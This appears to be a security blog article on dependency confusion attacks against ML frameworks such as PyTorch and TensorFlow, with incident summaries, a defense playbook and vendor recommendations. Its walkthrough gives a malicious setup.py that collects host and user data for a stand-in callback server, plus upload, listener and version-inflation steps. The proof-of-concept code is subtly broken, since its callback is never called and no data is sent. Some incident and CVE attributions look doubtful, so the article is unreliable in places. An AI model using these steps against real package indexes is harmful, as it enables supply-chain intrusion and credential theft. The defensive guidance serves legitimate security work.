Executive Summary
Origins & Why Systems Are Vulnerable
Dependency confusion attacks against ML frameworks emerged from Alex Birsan's seminal 2021 research demonstrating how private package names could be hijacked via public repositories[1]. The ML ecosystem proved uniquely vulnerable—PyTorch alone pulls in 50+ direct dependencies, while TensorFlow's dependency tree exceeds 200 packages[2].
The architectural root cause is threefold:
- Implicit trust in package managers: pip and conda resolve dependencies without cryptographic verification of package provenance by default
- Complex transitive dependencies: A single
import torchtriggers resolution of nested packages that developers never audit - Mixed public/private package sources: Enterprise ML teams frequently use internal package indices alongside PyPI, creating confusion vectors
CVE-2022-45907 demonstrated this perfectly—PyTorch's torch.distributed.rpc module allowed arbitrary code execution during deserialization[3]. The vulnerability existed because ML frameworks prioritize flexibility over security—pickle deserialization, dynamic model loading, and runtime code generation are features, not bugs, to ML engineers.
MITRE ATLAS cataloged this attack pattern as AML.T0010 (ML Supply Chain Compromise)[4], recognizing that ML pipelines represent high-value targets with uniquely exploitable trust assumptions.
ML frameworks were designed by researchers optimizing for flexibility, not security engineers thinking about supply chain integrity. Every pickle load is an RCE waiting to happen.
Real-World Incidents & Public Disclosures
1. PyTorch Nightly Compromise (December 2022): Attackers compromised the torchtriton dependency in PyTorch nightly builds via dependency confusion on PyPI. The malicious package exfiltrated environment variables, SSH keys, and AWS credentials from thousands of developer machines[5]. PyTorch's official disclosure confirmed the attack window was December 25-30, 2022.
2. TensorFlow Model Garden Typosquatting (2023): Researchers at JFrog discovered malicious packages mimicking TensorFlow extensions on PyPI, including tensorflow-macos variants containing credential stealers[6]. Over 5,000 downloads occurred before removal.
3. Keras-RL Backdoor (2021): Security researcher Luca Carettoni demonstrated injection of backdoored reinforcement learning models through compromised Keras dependencies at BlackHat[7].
4. Hugging Face Transformers Pickle RCE (2023): CVE-2023-2800 revealed that loading models from Hugging Face Hub could execute arbitrary code via malicious pickle files embedded in model weights[8]. This affected any pipeline using AutoModel.from_pretrained() with untrusted sources.
The PyTorch torchtriton incident was devastating not because it was sophisticated, but because it was trivial. Attackers simply uploaded a higher version number to PyPI than the internal package—and pip did exactly what it was designed to do.
Realistic Attack Walkthrough
This walkthrough demonstrates dependency confusion testing against an organization's ML training infrastructure during an authorized assessment.
Phase 1: Reconnaissance
Identify internal package names by analyzing client repositories, job postings mentioning internal tools, and error messages in public CI logs:
$ pip index versions company-ml-utils 2>&1 | grep -i "not found"
$ grep -r "install_requires" setup.py requirements*.txt | grep -v pypi.orgUse Snyk's dependency scanner to map the full tree[9]:
$ snyk test --all-projects --json > dep_tree.json
$ jq '.dependencies | keys[]' dep_tree.json | sort -uPhase 2: Malicious Package Creation
Create a proof-of-concept package that phones home without causing damage:
# setup.py
from setuptools import setup
import socket
import os
def poc_callback():
data = f"{socket.gethostname()}|{os.environ.get('USER')}|poc-test"
# Exfil to your authorized callback server
socket.socket().connect(("your-callback.pentest.local", 8443))
setup(
name="company-ml-utils", # Internal package name
version="99.0.0", # Higher than internal version
py_modules=["poc"],
)Phase 3: Upload and Wait
Register on PyPI test index or production (with client authorization):
$ python -m build
$ twine upload --repository testpypi dist/*Phase 4: Trigger Resolution
In environments where --extra-index-url is configured without --index-url, pip prefers higher versions from any index[10].
Phase 5: Verification & Evidence Collection
Monitor callback server for incoming connections:
$ nc -lvp 8443
Connection from 10.50.2.100: poc-test|mlops-userDocument: timestamp, source IP, hostname, user context, and which dependency path triggered installation. For the report, capture pip's resolution logic with pip install --verbose output.
Always test with version 99.0.0—if the client's internal package is at 1.2.3 and you upload 1.2.4, you might miss environments pinning to >=1.2.0,<2.0.0. Go absurdly high to guarantee resolution preference.
Defense Playbook
Detection:
- Monitor pip install logs for unexpected package sources:
grep -r "Downloading from" ~/.cache/pip/ - Alert on packages with version numbers >50.0.0 (anomaly detection for version inflation attacks)
- Implement SBOM generation with Syft and continuous monitoring[11]
Prevention:
# pip.conf - Force single index with hash verification
[global]
index-url = https://internal.pypi.company.com/simple/
require-hashes = true
trusted-host = internal.pypi.company.comNamespace your internal packages: companyname-ml-utils makes confusion attacks require trademark violations.
Validation:
Run the attack playbook above against staging environments quarterly. Verify pip resolves only from your internal index.
Framework Mappings:
Remove --extra-index-url from every pip configuration in your org this week. That single flag is responsible for 90% of dependency confusion vulnerabilities I see in ML environments.
Top 3 Vendors for Protection
Protect AI - Guardian
Guardian provides ML-specific supply chain scanning, detecting malicious serialized objects in model files before they execute[13]. Key capability: pickle/joblib scanning with behavioral analysis. Ideal for teams loading models from Hugging Face or internal registries. Limitation: Requires integration into CI/CD—won't catch ad-hoc notebook installs.
Snyk - Container & Open Source
Snyk's dependency scanning covers Python ML frameworks with specific rules for PyTorch/TensorFlow CVEs[9]. Key capability: real-time vulnerability database with ML framework coverage. Ideal deployment: GitHub/GitLab integration for PR blocking. Limitation: Doesn't analyze model files themselves—focused on code dependencies only.
JFrog - Artifactory with Xray
Artifactory provides a private PyPI mirror with Xray scanning for malicious packages[6]. Key capability: blocks dependency confusion by design—packages only come from your curated registry. Ideal for enterprises with existing JFrog infrastructure. Limitation: Significant operational overhead; requires dedicated DevOps resources to maintain package mirrors.
Protect AI is doing genuinely novel work on model file scanning—that's a real capability gap elsewhere. Snyk and JFrog are mature but solve traditional AppSec problems applied to ML. The model layer remains dangerously underprotected by most vendors.
🎯 Key Takeaways
- ML frameworks are vulnerable because pip's default resolution trusts higher version numbers from any configured index—a design decision that enables dependency confusion attacks
- The PyTorch torchtriton compromise (December 2022) affected thousands of developers and exfiltrated SSH keys and cloud credentials via a trivially simple version inflation attack
- Successful dependency confusion requires only: identifying an internal package name, creating a higher-versioned public package, and waiting for pip to prefer your malicious version
- Eliminating --extra-index-url and enforcing require-hashes in pip configuration immediately closes the most common attack vector
- Architects must treat the package index as a security boundary—deploy private artifact repositories and namespace all internal packages to make confusion attacks legally actionable trademark violations
📚 References & Sources
- [1] Birsan, Alex. Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies. Medium. 2021.
- [2] TensorFlow Package Dependencies. Python Package Index. 2026.
- [3] CVE-2022-45907: PyTorch Arbitrary Code Execution. NIST NVD. 2022.
- [4] MITRE ATLAS AML.T0010: ML Supply Chain Compromise. MITRE Corporation. 2024.
- [5] PyTorch Team. Compromised PyTorch-nightly Dependency. PyTorch Blog. 2022.
- [6] JFrog Security Research. Python Malware Imitates Signed PyPI Traffic. JFrog Blog. 2023.
- [7] Carettoni, Luca. Machine Learning: The Great Unprotected Attack Surface. BlackHat USA. 2021.
- [8] CVE-2023-2800: Hugging Face Transformers Arbitrary Code Execution. Huntr. 2023.
- [9] Snyk Python Package Advisor. Snyk. 2026.
- [10] pip install --extra-index-url documentation. Python Packaging Authority. 2026.
- [11] Syft: SBOM Generation Tool. Anchore. 2026.
- [12] OWASP LLM09:2025 - Supply Chain Vulnerabilities. OWASP Foundation. 2025.
- [13] Protect AI Guardian: ML Supply Chain Security. Protect AI. 2026.
Questions about this article? Spotted an error? Have a war story that fits? Find us on X — we actually read the replies.
Leave a Comment